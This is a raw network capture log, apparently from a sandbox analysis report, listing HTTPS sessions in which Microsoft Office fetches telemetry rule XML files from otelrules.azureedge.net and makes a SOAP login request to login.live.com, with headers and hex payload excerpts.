                                                                                                                                                                                                        2024-12-04 12:54:05 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        134192.168.2.74986113.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:54:06 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:54:06 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:54:06 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1366
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BDF1E2608"
                                                                                                                                                                                                        x-ms-request-id: 77d68196-001e-0066-56cc-45561e000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125406Z-1746fd949bd54zxghC1EWRzre400000001dg00000000ars0
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:54:06 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        135192.168.2.74986220.190.177.22443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:54:06 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: application/soap+xml
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                        Content-Length: 3592
                                                                                                                                                                                                        Host: login.live.com
                                                                                                                                                                                                        2024-12-04 12:54:06 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                        2024-12-04 12:54:07 UTC653INHTTP/1.1 200 OK
                                                                                                                                                                                                        Cache-Control: no-store, no-cache
                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                        Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                        Expires: Wed, 04 Dec 2024 12:53:07 GMT
                                                                                                                                                                                                        P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                        FdrTelemetry: &481=21&59=33&213=10&215=0&315=1&215=0&315=1&214=56&288=16.0.30405.9
                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                        x-ms-route-info: C525_BAY
                                                                                                                                                                                                        x-ms-request-id: 29c65de1-85db-483d-9acb-3db62a4d78f4
                                                                                                                                                                                                        PPServer: PPV: 30 H: PH1PEPF0001B8C8 V: 0
                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:54:07 GMT
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 11390
                                                                                                                                                                                                        2024-12-04 12:54:07 UTC11390INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        136192.168.2.74986313.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:54:06 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:54:07 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:54:06 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1399
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BE8C605FF"
                                                                                                                                                                                                        x-ms-request-id: 4885a0d8-201e-0096-65c7-45ace6000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125406Z-1746fd949bdfg4slhC1EWR34t0000000014g000000004nas
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:54:07 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        137192.168.2.74986413.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:54:06 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:54:07 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:54:07 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1362
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BDF497570"
                                                                                                                                                                                                        x-ms-request-id: b15ffdf0-e01e-0051-2acd-4584b2000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125407Z-1746fd949bdlnsqphC1EWRurw00000000130000000006rtr
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:54:07 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        138192.168.2.74986613.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:54:07 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:54:07 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:54:07 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1366
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BEA414B16"
                                                                                                                                                                                                        x-ms-request-id: 46703850-c01e-002b-03cc-456e00000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125407Z-1746fd949bdl6zq5hC1EWRf3ws00000000t000000000bpqm
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:54:07 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        139192.168.2.74986513.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:54:07 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:54:07 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:54:07 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1403
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BDC2EEE03"
                                                                                                                                                                                                        x-ms-request-id: eed2a8f6-b01e-0001-60d2-4546e2000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125407Z-1746fd949bdqpttnhC1EWRe1wg0000000100000000005kkb
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:54:07 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        140192.168.2.74986713.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:54:08 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:54:08 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:54:08 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1399
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BE1CC18CD"
                                                                                                                                                                                                        x-ms-request-id: a6a36225-101e-000b-71ce-455e5c000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125408Z-1746fd949bd6zq92hC1EWRry4800000001800000000047yt
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:54:08 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        141192.168.2.74986813.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:54:08 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:54:09 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:54:09 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1362
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BEB256F43"
                                                                                                                                                                                                        x-ms-request-id: 4f5c15a4-401e-0067-28ce-4509c2000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125409Z-1746fd949bdkw94lhC1EWRxuz400000001d000000000673g
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:54:09 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        142192.168.2.74986913.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:54:09 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:54:09 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:54:09 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1403
